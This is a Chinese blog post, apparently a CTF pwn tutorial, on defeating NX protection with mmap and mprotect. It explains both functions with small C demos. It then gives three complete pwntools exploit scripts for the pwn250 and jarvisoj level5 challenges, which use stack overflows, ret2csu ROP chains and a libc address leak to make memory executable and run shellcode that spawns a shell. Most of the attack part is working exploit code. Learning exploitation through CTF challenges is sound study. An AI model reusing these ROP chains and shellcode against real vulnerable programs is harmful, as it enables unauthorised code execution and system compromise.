通过mmap&mprotect来绕过nx

最新推荐文章于 2024-02-04 00:09:32 发布
最新推荐文章于 2024-02-04 00:09:32 发布
阅读量1k 收藏 9
点赞数 6
分类专栏: rop
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45595732/article/details/115166820
版权

mmap

mmap函数的用法

mmap将一个文档或者其它对象映射进内存。文档被映射到多个页上,如果文档的大小不是所有页的大小之和,最后一个页不被使用的空间将会清零。mmap在用户空间映射调用系统中作用很大。
头文档 <sys/mman.h>

void* mmap(void* start,size_t length,int prot,int flags,int fd,off_t offset);
第一个参数:分配新内存的地址
第二个参数:新内存的长度(0x1000的倍数),长度单位是字节,不足一内存页按一内存页处理
第三个参数:期望的内存保护标志,不能与文档的打开模式冲突。
			PROT_EXEC(可执行)在内存中用4来表示
			PROT_READ(可读)在内存中用1来表示
			PROT_WRITE(可写)在内存中用2来表示
			PROT_NONE(不可访问)在内存中用0来表示
第四个参数:映射的类型
			MAP_FIXED()在内存中用10来表示
			MAP_SHARED()在内存中用1来表示
			MAP_PRIVATE()在内存中用2来表示
			MAP_NORESERVE()在内存中用4000来表示
			MAP_LOCKED()在内存中用2000来表示
第五个参数:文档描述符,可设为0
第六个参数:如果为文档映射,则此处代表定位到文档的那个位置,然后开始向后映射。

函数返回值:
	若该函数执行成功,mmap()返回被映射区的指针,失败时返回MAP_FAILED(-1)

在nx保护开启的情况下,我们依然可以通过mmap来申请出一段有读写执行权限的内存,通常mmap(target_addr,0x1000,7,34,0,0),这里target_addr需要页对齐也就是0x1000的整数倍,若不对齐,申请到的起始地址将不是target_addr。

写个简单的程序验证一下,可以看到申请到的内存具有rwx权限,并且函数返回值为mmap到的内存的起始地址。

#include<stdio.h>
#include <sys/mman.h>
int main(){
	void *addr;
	addr = 0xdead1000;
	mmap(addr,0x1000,7,34,0,0);
	return 0;
}

在这里插入图片描述

通过一道例题再操练一下

https://github.com/gloxec/record/blob/master/ssctf_2017/pwn250

基本信息:静态链接、32位、nx开启

在这里插入图片描述

print中memcpy导致栈溢出

在这里插入图片描述
在这里插入图片描述

思路:调用mmap申请一块有rwx权限的内存,往里面写shellcode,最终返回到shellcode上

exp

from pwn import*
context.log_level = 'debug'
context.binary = './pwn250'
p = process('./pwn250')
elf = ELF('./pwn250')
mmap_addr = elf.sym['mmap']
main_addr = elf.sym['main']
read_addr = elf.sym['read']
newaddr=0xbeef1000

p.sendlineafter(']',str(0x100))
payload = 'a'*(58+4)+p32(mmap_addr)+p32(main_addr)+p32(newaddr)+p32(1024)+p32(7)+p32(34)+p32(0)+p32(0)
p.sendafter(']',payload)

p.sendlineafter(']',str(0x100))
payload = 'a'*(58+4)+p32(read_addr)+p32(newaddr)+p32(0)+p32(newaddr)+p32(0x100)
p.sendafter(']',payload)

#gdb.attach(p,'b print')
shellcode = asm(shellcraft.sh())
p.sendline(shellcode)

p.interactive()

mprotect

函数原型

#include <sys/mman.h>
int mprotect(void *addr, size_t len, int prot)

mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 

第一个参数:开始地址(该地址应是0x1000的倍数,以页方式对齐)
第二个参数:指定长度(长度也应该是0x1000的倍数)
第三个参数:指定属性

如果执行成功,则返回0;如果执行失败,则返回-1,并且设置errno变量,说明具体因为什么原因造成调用失败。错误的原因主要有以下几个:
1)EACCES
该内存不能设置为相应权限。这是可能发生的,比如,如果你 mmap(2) 映射一个文件为只读的,接着使用 mprotect() 标志为 PROT_WRITE。

2)EINVAL
start 不是一个有效的指针,指向的不是某个内存页的开头。

3)ENOMEM
内核内部的结构体无法分配。

4)ENOMEM
进程的地址空间在区间 [start, start+len] 范围内是无效,或者有一个或多个内存页没有映射。 

如果调用进程内存访问行为侵犯了这些设置的保护属性,内核会为该进程产生 SIGSEGV (Segmentation fault,段错误)信号,并且终止该进程。

写个简单的程序验证一下,可以看到的原本不是rwx权限的页具有了rwx权限

#include<stdio.h>
#include <sys/mman.h>
int main(){
	void *addr;
	addr = 0x00400000;
	mprotect(addr,0x1000,7);
	return 0;
}

在这里插入图片描述

下面用mprotect来做刚刚那道题目

思路,把bss段的权限用mprotect改为rwx,把shellcode写到bss段上再返回到shellocde上。

from pwn import*
context.log_level = 'debug'
context.binary = './pwn250'
p = process('./pwn250')
elf = ELF('./pwn250')
mprotect_addr = elf.sym['mprotect']
main_addr = elf.sym['main']
read_addr = elf.sym['read']
bss_addr = 0x080ec000


p.sendlineafter(']',str(0x100))
payload = 'a'*(58+4)+p32(mprotect_addr)+p32(main_addr)+p32(bss_addr)+p32(0x1000)+p32(7)
p.sendafter(']',payload)

p.sendlineafter(']',str(0x100))
payload = 'a'*(58+4)+p32(read_addr)+p32(bss_addr)+p32(0)+p32(bss_addr)+p32(0x100)
p.sendafter(']',payload)

#gdb.attach(p,'b print')
shellcode = asm(shellcraft.sh())
p.sendline(shellcode)

p.interactive()

再穿插一道例题jarvisoj level5

动态链接,64位栈溢出,题目描述是不能执行system或execve,那么我们用mprotect来做

在这里插入图片描述

exp

from pwn import*
context.log_level = 'debug'
context.arch = 'amd64'
def pr(a,addr):
	log.success(a+'====>'+hex(addr))

def csu_payload(got_addr,arg1,arg2,arg3,ret_addr):
	payload = 'a'*0x88
	payload += p64(0x4006AA)
	payload += p64(0)+p64(1)+p64(got_addr)+p64(arg3)+p64(arg2)+p64(arg1)
	payload += p64(0x400690)+'a'*56 + p64(ret_addr)
	return payload
def ropchain(target,arg1,arg2,arg3,ret_addr):
	payload = 'a'*0x88
	payload +=p64(prdi_ret)+p64(arg1)
	payload +=p64(prsi_ret)+p64(arg2)
	payload +=p64(prdx_ret)+p64(arg3)
	payload +=p64(target)+p64(ret_addr)
	return payload
p =process('./level3_x64')
elf = ELF('./level3_x64')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

prdi_ret = 0x4006B3
prsi_ret = 0x23eea
prdx_ret = 0x1b96
write_got = elf.got['write']
write_plt = elf.plt['write']
read_got = elf.got['read']
vuln = elf.sym['vulnerable_function']
bss = 0x600000+0xb00

payload = csu_payload(write_got,1,write_got,8,vuln)
p.sendafter('Input:\n',payload)

libcbase = u64(p.recv(8)) - libc.sym['write']
mprotect = libcbase + libc.sym['mprotect']
prsi_ret += libcbase
prdx_ret += libcbase 
pr('libcbase',libcbase)

#gdb.attach(p,'b *0x400618')
payload = ropchain(mprotect,0x600000,0x1000,7,vuln)
p.sendafter('Input:\n',payload)

payload = csu_payload(read_got,0,bss,0x200,bss)
p.sendafter('Input:\n',payload)


shellcode = asm(shellcraft.sh())
p.send(shellcode)

p.interactive()

本来想用mmap试试,发现r9相关的rop有点难利用也懒得试了,老懒狗了。

在这里插入图片描述
在这里插入图片描述

参考文章

https://www.dazhuanlan.com/2019/12/05/5de804217ca51/

https://blog.csdn.net/roland_sun/article/details/33728955

TTYflag
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
PWN基础13:Ret2Syscall 突破 NX保护
prettyX的博客
07-15 722
问题背景 ret2text漏洞利用,是依赖于程序中存在system("/bin/sh")的函数,如果在程序本身中没有调用这个函数,那怎么办呢? 我们的解决办法是使用ret2shellcode,自定义shellcode代码,但是这种方法的局限性是需要程序没有开启NX保护,那如果程序开了NX保护呢,又该如何呢? 让我们一起来学习Ret2Syscall 基础知识 1、Gadgets:是指在程序中的指令片段,有时为了达到执行命令的目的,需要多个Gadget来完成我们的功能。Gadget最后一般都有ret指
Ret2Syscall绕过NX、ASLR保护
X丶 的博客
11-20 1501
Ret2Syscall,即控制程序执行系统调用,进而获取shell。 下面看看我们的vuln程序。 可以看出,程序中的gets有明显的 溢出漏洞 用gdb打开, 检查一下文件开启了哪些防护: 可以看出程序开启了 NX(栈不可执行)防护,那么,我们可以用ROP绕过防护 接来下,我们利用溢出漏洞来控制程序执行syscall(系统调用) 有关syscall系统调用的信息,可以在...
NX机制及绕过策略-ret2libc
qq_41683305的博客
03-24 555
程序: 1.c #include <stdio.h> void exploit() { system("/bin/sh"); } void func() { char str[0x20]; read(0,str,0x50); } int main() { func(); return 0; } 0x01 NX介绍 溢出攻击的本质在于冯·诺依曼计算机模型对数据和代码没有...
栈溢出学习(五)之NX,ASLR绕过方法
Pz_mstr's Blog
03-29 3732
前言 栈溢出学习(五)之NX,ASLR绕过方法,讲述NX,ASLR保护机制及其绕过方法 系列文章 栈溢出学习(一)之利用预留后门 & return2shellcode 栈溢出学习(二)之 jmp esp & return2libc 栈溢出学习(三)之简单ROP 栈溢出学习(四)之Hijack GOT 本文属于新手实验难度,过程比较详细,适合新手学习 样例代码 本文使用的代码如下...
CTFshow-pwn入门-栈溢出pwn49(静态链接pwn-mprotect函数的应用)
T1ngSh0w的博客
07-08 1222
ctfshow-pwn入门-栈溢出pwn49-mprotect函数静态链接pwn的应用
mmap2.rar_mmap
07-14
在linux环境下,用c语言编写的关于mmap使用方法的小程序
mmap打开工具快速安装
04-04
标题中的“mmap打开工具快速安装”指的是使用特定软件(如MindManager)来处理和查看mmap文件。mmap,全称Memory-Mapped File,是一种内存映射文件的技术,允许程序将文件的内容直接映射到内存空间,以便高效地读写...
mmap2mm mmap2mm mmap2mm
01-05
mmap2mm 工具包 解压python.mmap到目录下,然后使用如下工具转换解压缩目录的Document.xml xsltproc.exe -o test.mm mm2fm.xslt Document.xml 生成的test.mm 就是目标freemind格式的mm文件
利用mmap实现文件拷贝功能
08-25
利用mmap实现文件拷贝功能是指使用mmap系统调用来实现文件拷贝功能。mmap是一种 memory-mapped file 机制,允许程序直接访问磁盘文件,而不需要使用标准的文件I/O操作。这种机制可以提高文件拷贝的速度,特别是在...
mmap测试例程应用实例
01-29
内存映射(mmap)是Linux系统中一种高效的数据访问技术,它允许程序直接通过内存地址来访问文件,而无需经过传统的I/O操作。这种方式极大地优化了大文件处理的性能,因为它减少了磁盘I/O的次数,提高了数据的吞吐量...
一步一步分析return to mprotect的利用
2301_77498991的博客
04-28 115
我们可以通过mprotect()函数来修改区段的权限(例如bss),使其权限变为(rwx),然后将shellcode写进去并跳转过去.写一个c来测试一下,为了方便测试,就关闭了canary保护.(附件提供写好的题目,源码和exp)看到网上很少专门写这个漏洞利用方式的文章,就想参考自己之前的学习记录来写一篇记录.mprotect()函数: 用来修改一段指定内存区域的保护属性.- int prot:区段的权限(可以用8进制来表示)- size_t len: 区段的大小。跳转到bss段即可,
Linux中mprotect()函数详解
热门推荐
qq_15762939的博客
01-29 1万+
测试源码 //mmp.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/mman.h> int *g_ps32Result; void add(int a, int b) { *g_ps32Result = a + b; } void s...
pwn入门之mprotect函数的利用
wangxunyu6的博客
01-24 1154
所以payload的意思就是先调用mprotect函数通过pop将原本的参数覆盖为我们想要的参数,然后返回到read函数,然后pop弹掉read的参数,把第二个参数改为bss的地址,读入shellcode。通过gadget找到一个含有三个pop一个ret指令的地址,我们要通过这个指令将mprotect函数原来的参数pop走,让我们能够填入我们想要的参数.pop_ebx_esi_ebp_ret=0x80a019b然后就是构造payload了先上代码。这题是64位的所以着重讲一下pay的构造。
ctf——pwn堆的基础知识
m0_64195960的博客
04-24 2455
1前言 一、笔者想说 笔者是一个不大聪明的pwn的新手,这是我根据《ctf权威竞赛指南》,b站课程,一些师傅的博客,ctfviki做的笔记,便于学习和复习 如果有错误的地方还请给位师傅指正 二、调试 下面所展示的gdb调试是根据一下调试的 注意: 1、调试记得执行到malloc后再去查看 2、记得编译 一、glibc堆概述 1)堆概述 堆是程序虚拟内存中由低地址向高地址增长的线性区域,出于效率和页对齐的考虑,通常会分配相当大的连续内存。程序再次申请时便会从这片内存中分配,直到堆空间
浅谈mprotect函数和mmap函数
Rt1Text的博客
06-27 1040
在Linux中,mprotect()函数可以用来修改一段指定内存区域的权限。 细说参数一句话mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。注意几点: mmap函数 首先了解内存映射:内存映射:(可以类别数学中函数的映射关系,抽象类比的理解这种关系或者说是过程)将用户空间的一段内存区域映射到内核空间,映射成功后,用户对这段内存区域的修改可以直接反映到内核空间,同样,内核空间对这段区域的修改也直接反映用户空间通俗点理解嘛:就是你和镜子中的你,你发
linux编程之mprotect
云计算?
11-06 616
mprotect: 设置内存访问权限 mmap 的第三个参数指定对内存区域的保护,由标记读、写、执行权限的 PROT_READ、PROT_WRITE 和 PROT_EXEC 按位与操作获得,或者是限制没有访问权限的 PROT_NONE。如果程序尝试在不允许这些权限的本地内存上操作,它将被 SIGSEGV 信号(Segmentation fault,段错误)终止。 在内存映射完成后,这些...
CTF PWN绕过ASLR和NX的三种利用方式
蚁景网安学院
09-04 984
author:giantbranch作者简介:考上大学因为分数不算太好,被分配到了信息安全专业,一开始只是随便跟着学,后来一个偶然的机会跟着一个校园团队去搞web开发,微信开发去了,也挺...
mprotect排查全局变量内存被篡改问题
最新发布
攀的博客
02-04 969
内存篡改
Unix高级编程:文件的基本操作、mmap将文件映射虚拟地址、文件描述符的复制
Hello, New World!
01-15 772
一、文件的基本操作 "open"(2) #include #include #include int open(const char *pathname, int flags,...); //正确写法,真正原型 以写入的方式打开文件,如果文件不存在,则创建文件,指定文件的权限为 664 open(filename, O_RDWR|O_CREAT|O_TRUNC, mode);
通过mmap对文件进行读取
05-18
使用mmap可以将文件映射到进程的地址空间中,这样就可以像访问普通内存一样访问文件内容,而且效率非常高。以下是一个简单的示例代码: ```c #include <stdio.h> #include <fcntl.h> #include <sys/mman.h> #include <sys/stat.h> int main(int argc, char *argv[]) { int fd; struct stat sb; char *mapped; fd = open(argv[1], O_RDONLY); fstat(fd, &sb); mapped = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0); printf("%s", mapped); munmap(mapped, sb.st_size); close(fd); return 0; } ``` 在这个示例中,首先打开了一个文件,然后获取了文件的大小。接下来使用mmap将文件映射到进程的地址空间中,并返回映射后的指针。最后就可以使用指针直接访问文件内容了。最后要记得使用munmap解除映射,并关闭文件描述符。 需要注意的是,通过mmap映射的文件内容是只读的,如果需要写入文件,需要使用MAP_SHARED标志并且需要确保文件具有可写权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值